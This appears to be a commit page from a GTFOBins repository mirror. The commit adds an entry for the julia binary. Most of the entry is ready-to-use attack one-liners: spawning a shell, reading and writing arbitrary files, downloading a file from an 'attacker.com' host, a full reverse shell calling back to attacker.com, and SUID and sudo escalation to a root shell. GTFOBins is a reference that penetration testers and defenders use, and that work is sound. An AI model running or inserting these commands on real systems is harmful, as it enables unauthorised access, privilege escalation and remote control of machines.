~rek2/GTFOBins

d48892a5ccd1eb7f7b79e690195164626d0b48d1 — Andrea Cardaci 1 year, 7 months ago c6f2bb1 + 43f2ea0
Merge pull request #382 from davidsonmizael/patch-1

Add julia
1 files changed, 31 insertions(+), 0 deletions(-)

A _gtfobins/julia.md
A _gtfobins/julia.md => _gtfobins/julia.md +31 -0
@@ 0,0 1,31 @@
---
functions:
  shell:
    - code: |
        julia -e 'run(`/bin/sh`)'
  file-read:
    - code: |
        export LFILE=file_to_read
        julia -e 'print(open(f->read(f, String), ENV["LFILE"]))'
  file-write:
    - code: |
        export LFILE=file_to_write
        julia -e 'open(f->write(f, "DATA"), ENV["LFILE"], "w")'
  file-download:
    - code: |
        export URL=http://attacker.com/file_to_get
        export LFILE=file_to_save
        julia -e 'download(ENV["URL"], ENV["LFILE"])'
  reverse-shell:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        julia -e 'using Sockets; sock=connect(ENV["RHOST"], parse(Int64,ENV["RPORT"])); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'
  suid:
    - code: |
        ./julia -e 'run(`/bin/sh -p`)'
  sudo:
    - code: |
        sudo julia -e 'run(`/bin/sh`)'
---